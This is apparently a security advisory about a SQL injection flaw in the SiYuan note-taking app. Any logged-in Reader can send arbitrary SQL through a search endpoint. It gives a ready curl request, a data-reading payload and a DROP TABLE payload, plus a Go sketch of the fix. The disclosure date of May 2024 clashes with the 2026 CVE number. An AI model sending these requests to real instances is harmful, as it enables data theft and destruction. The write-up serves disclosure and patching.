SiYuan is a popular open-source personal knowledge management system. If you organize notes or documents, you may have used or heard about it. Recently, a serious security vulnerability (CVE-2026-32767) was found and fixed in SiYuan: every release before 3.6.1 is affected. The issue allows any logged-in user, including one with the lowest "Reader" access level, to run arbitrary SQL statements against the application's SQLite database, which means data theft, data deletion, and tampering with the workspace index are all on the table.

Below you'll find an explanation of how the vulnerability works, the exact request that triggers it, a look at why the affected endpoint behaves differently from its properly guarded sibling, and what to do about it.

Vulnerable Endpoint

- Endpoint: /api/search/fullTextSearchBlock

Code Snippet: How an Attacker Would Exploit This

Scenario: You're a "Reader" (read-only access) and want to pull data you should never be able to query directly. The table and column names in the examples below are illustrative; the point is that the whole SQL string is attacker-controlled.

Step 1: Authenticate and grab your session token or cookie.

Step 2: Send a POST request to /api/search/fullTextSearchBlock with the body

{
  "method": 2,
  "sql": "SELECT id, email FROM user"
}

*You can use curl, Postman, or any HTTP client (the cookie name below is a placeholder; use whatever session cookie your instance sets at login):*

curl -X POST "https://YOUR_SIYUAN_INSTANCE/api/search/fullTextSearchBlock" \
     -H "Content-Type: application/json" \
     -H "Cookie: auth_token=YOUR_SESSION_COOKIE" \
     -d '{"method":2,"sql":"SELECT id, email FROM user"}'

*To destroy data instead of reading it, the same request carries a write statement:*

{
  "method": 2,
  "sql": "DROP TABLE user"
}

Why This Works: Source Code Dive

- The endpoint /api/search/fullTextSearchBlock is not wrapped in any admin-role or read-only check.
- When the request body has method == 2, the handler passes the sql parameter straight to SQLite with no validation or allow-listing.
- Contrast: /api/query/sql, the endpoint that is *meant* to expose raw SQL, is protected by the CheckAdminRole and CheckReadonly middleware, so only an administrator can reach it and it is blocked when the workspace is in read-only mode.

Thus, any authenticated user can run *ANY* SQL statement through the search endpoint. The Reader/Admin distinction and the read-only mode are both bypassed, which completely undermines SiYuan's access-control model: the controls exist, they are simply not applied on this code path.
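To make the difference between the two code paths concrete, here is a small Go model of the access decision. This is an added illustration, not SiYuan's code: the Role type, the numeric role values, the function names and the stand-in execSQL are this example's own assumptions. vulnerableSearch mirrors the flaw (method 2 reaches the raw-SQL path with no role check); hardenedSearch applies the two gates the write-up says /api/query/sql has (admin role, read-only mode) and adds a SELECT-only allow-list as defence in depth, since a search endpoint never needs to write.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
)

// Role models the access levels the write-up mentions. The type and its
// numeric values are assumptions of this example, not SiYuan's definitions.
type Role int

const (
	RoleReader Role = iota // lowest privilege, read-only
	RoleEditor
	RoleAdmin
)

// methodSQL is the "method" value the write-up says selects the raw-SQL path.
const methodSQL = 2

// SearchRequest is the subset of the request this example cares about.
type SearchRequest struct {
	Role   Role
	Method int
	SQL    string
}

var (
	ErrAdminRequired = errors.New("admin role required for raw SQL")
	ErrReadOnly      = errors.New("workspace is read-only")
	ErrNotSelect     = errors.New("only a single SELECT statement is allowed here")
)

// execSQL stands in for the database call; it echoes the statement so the
// example runs without SQLite. In the real handler this is where damage happens.
func execSQL(sql string) string { return "executed: " + sql }

// vulnerableSearch reproduces the flaw: the caller's role is never consulted,
// so method==2 hands the attacker-controlled string straight to execSQL.
func vulnerableSearch(req SearchRequest) (string, error) {
	if req.Method == methodSQL {
		return execSQL(req.SQL), nil
	}
	return "fts: " + req.SQL, nil
}

// selectOnly accepts a statement that starts with SELECT and contains no
// second statement after a semicolon, so "SELECT 1; DROP TABLE x" is rejected.
var selectOnly = regexp.MustCompile(`(?is)^\s*select\b[^;]*;?\s*$`)

// hardenedSearch gates the raw-SQL path: admin role first, then read-only
// mode, then the SELECT-only allow-list. Non-SQL search methods are unaffected.
func hardenedSearch(req SearchRequest, readOnlyMode bool) (string, error) {
	if req.Method != methodSQL {
		return "fts: " + req.SQL, nil
	}
	if req.Role != RoleAdmin {
		return "", ErrAdminRequired
	}
	if readOnlyMode {
		return "", ErrReadOnly
	}
	if !selectOnly.MatchString(req.SQL) {
		return "", ErrNotSelect
	}
	return execSQL(req.SQL), nil
}

func main() {
	// A Reader sending the destructive payload from the write-up.
	attack := SearchRequest{Role: RoleReader, Method: methodSQL, SQL: "DROP TABLE user"}
	out, err := vulnerableSearch(attack)
	fmt.Println("vulnerable:", out, err)
	out, err = hardenedSearch(attack, false)
	fmt.Println("hardened:  ", out, err)
}
```

The ordering matters: the role check comes before anything touches the SQL string, so a Reader is rejected without the statement ever being parsed, and the allow-list only narrows what an administrator can do through this particular endpoint, leaving the dedicated /api/query/sql path for legitimate admin queries.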

Timeline and Fix

- Reported / discovered: May 2024
- Fixed in: v3.6.1 (release notes)

Vulnerable: all releases before v3.6.1

> If you're running SiYuan, upgrade to 3.6.1 or later immediately. After upgrading, re-send the request above from a Reader account: the statement should no longer be executed.

References and Further Reading

- Official Release Fix: SiYuan 3.6.1 Release
- CVE Record: CVE-2026-32767 on MITRE *(May not be live yet.)*
- Project GitHub: SiYuan on GitHub

Conclusion

If you or your team is running SiYuan, this is a critical security issue: *every logged-in user*, down to the lowest-privileged Reader, can run arbitrary SQL against your workspace database. Patch right now.

Stay vigilant, and secure your notes!

*This is original analysis written for security practitioners and SiYuan users. Please do not attempt unauthorized attacks against any systems you do not own or manage.*

Timeline

Published on: 03/20/2026 00:13:31 UTC
Last modified on: 03/20/2026 01:15:55 UTC